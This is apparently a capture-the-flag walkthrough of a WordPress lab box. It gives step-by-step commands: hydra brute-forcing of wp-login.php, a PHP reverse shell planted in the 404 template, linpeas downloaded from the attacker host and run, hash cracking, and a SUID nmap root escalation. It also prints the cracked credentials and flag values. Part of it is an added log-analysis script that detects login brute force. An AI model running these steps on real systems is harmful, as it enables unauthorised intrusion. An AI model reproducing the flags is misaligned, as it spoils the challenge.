Start port scanning and enumerating services.
# check if the box is up
ping <target-ip>
# run initial nmap scan
sudo nmap -sS -T4 <target-ip> -oN nmap/init
# run a service scan
sudo nmap -sV -p 22,80,443 -T4 <target-ip> -oN nmap/service
...
PORT STATE SERVICE REASON VERSION
22/tcp closed ssh reset ttl 64
80/tcp open http syn-ack ttl 64 Apache httpd
443/tcp open ssl/http syn-ack ttl 64 Apache httpd
# run script scan
nmap -Pn -p 22,80,443 --script default,vuln <target-ip> -oN nmap/scripts
...
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /wp-login.php: Possible admin folder
| /robots.txt: Robots file
| /feed/: Wordpress version: 4.3.1
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /image/: Potentially interesting folder
It appears to be an Apache web server, possibly running WordPress. Continue enumerating HTTP to confirm this.
# enumerate http
gobuster dir -u http://<target-ip>/ -w /usr/share/wordlists/dirb/common.txt -x txt,html,php -o gobuster.common
...
/robots.txt (Status: 200) [Size: 41]
/wp-login (Status: 200) [Size: 2657]
nikto -h http://<target-ip>/ -Format=txt -o nikto
...
+ GET Cookie wordpress_test_cookie created without the httponly flag
+ GET /wp-login/: Admin login page/section found.
+ GET /wordpress: A Wordpress installation was found.
+ GET /wp-admin/wp-login.php: Wordpress login found
+ GET /wordpresswp-admin/wp-login.php: Wordpress login found
+ GET /blog/wp-login.php: Wordpress login found
+ GET /wp-login.php: Wordpress login found
+ GET /wordpresswp-login.php: Wordpress login found
wpscan --url http://<target-ip>/ -e vp
...
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Rss Generator (Aggressive Detection)
| - http://<target-ip>/feed/, <generator>http://wordpress.org/?v=4.3.1</generator>
| - http://<target-ip>/comments/feed/, <generator>http://wordpress.org/?v=4.3.1</generator>
There are a few interesting entries in robots.txt.
# view robots.txt
curl http://<target-ip>/robots.txt
...
User-agent: *
fsocity.dic
key-1-of-3.txt
# grab both the files
wget http://<target-ip>/key-1-of-3.txt
wget http://<target-ip>/fsocity.dic
The text file is a flag and fsocity.dic appears to be a wordlist. Enumerate the WordPress username with the found wordlist.
# sort and remove duplicates in wordlist
sort fsocity.dic | uniq > fsocity.dic.uniq
# enumerate wp-login user
hydra -L fsocity.dic.uniq -p blah <target-ip> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
...
[80][http-post-form] host: <target-ip> login: Elliot password: blah
# bruteforce login
hydra -l Elliot -P fsocity.dic.uniq <target-ip> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
...
[80][http-post-form] host: <target-ip> login: Elliot password: ER28-0652
key-1-of-3.txt:073403c8a58a1f80d943455fb30724b9
Elliot:ER28-0652
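From the defender's side, the two hydra runs above leave a burst of POST requests to /wp-login.php from a single source in the Apache access log. The following is an added example, not part of the original walkthrough: it parses combined-format access log lines and flags any source IP whose POSTs to /wp-login.php exceed a threshold inside a sliding window. The log lines, IPs and threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?")[0]  # drop query string so /wp-login.php?x matches too
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], path, int(m["status"]))


def flag_login_bursts(lines, threshold=20, window=timedelta(seconds=60)):
    """Map source IP -> peak count of POSTs to /wp-login.php within any `window`.
    Only IPs whose peak reaches `threshold` are returned."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == "/wp-login.php":
            hits[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in hits.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window start forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def build_sample_log():
    """Constructed sample (not from the page): one host hammering wp-login.php,
    one host fetching robots.txt and logging in once, plus a junk line."""
    fmt = '{ip} - - [13/Nov/2015:10:00:{sec:02d} +0000] "{m} {p} HTTP/1.1" {st} 2657 "-" "Mozilla/5.0"'
    lines = [fmt.format(ip="10.0.0.5", sec=i, m="POST", p="/wp-login.php", st=200) for i in range(25)]
    lines.append(fmt.format(ip="192.168.1.20", sec=30, m="GET", p="/robots.txt", st=200))
    lines.append(fmt.format(ip="192.168.1.20", sec=45, m="POST", p="/wp-login.php", st=302))
    lines.append("not a log line - must be ignored")
    return lines


if __name__ == "__main__":
    for ip, n in flag_login_bursts(build_sample_log()).items():
        print(f"{ip}: {n} POSTs to /wp-login.php inside 60s")
```

The same logic runs unchanged over a real access log by replacing build_sample_log() with the file's lines; the 302 on the legitimate login versus repeated 200s on failures is a second signal worth keeping alongside the rate.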
Log into WordPress, edit the 404 template (404.php) and replace its contents with a PHP reverse shell.
# set up a listener on the attacking machine, then browse to a non-existent URL to trigger the 404 template
netcat -lvnp 8001
# stabilise captured shell
python3 -c 'import pty;pty.spawn("/bin/sh")'
export TERM=xterm
# background shell with Ctrl + Z
sudo stty raw -echo; fg
# list /home/robot to find the second flag
ls -la /home/robot
...
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
The flag file is only readable by robot, and password.raw-md5 appears to be a password hash. Upload LinEnum and/or linpeas to the target machine.
# on the attacking machine, serve LinEnum.sh and linpeas.sh
python3 -m http.server 8080
# on the target, download LinEnum.sh and linpeas.sh and make them executable
wget http://<attack-ip>:8080/LinEnum.sh
wget http://<attack-ip>:8080/linpeas.sh
chmod +x LinEnum.sh
chmod +x linpeas.sh
./LinEnum.sh
./linpeas.sh
...
[+] nmap is available for network discover & port scanning, you should use it yourself
...
-rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmap
Crack the found hash to escalate privileges to the robot user.
# on the attacking machine crack found hash with john
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt password.raw-md5
# log into robot
su robot
nmap is SUID root, so as per GTFOBins it can be used to spawn a root shell.
# escalate to root using nmap
nmap --interactive
nmap> !sh
robot:abcdefghijklmnopqrstuvwxyz
key-2-of-3.txt:822c73956184f694993bede3eb39f959
key-3-of-3.txt:04787ddef27c3dee1ee161b21670b4e4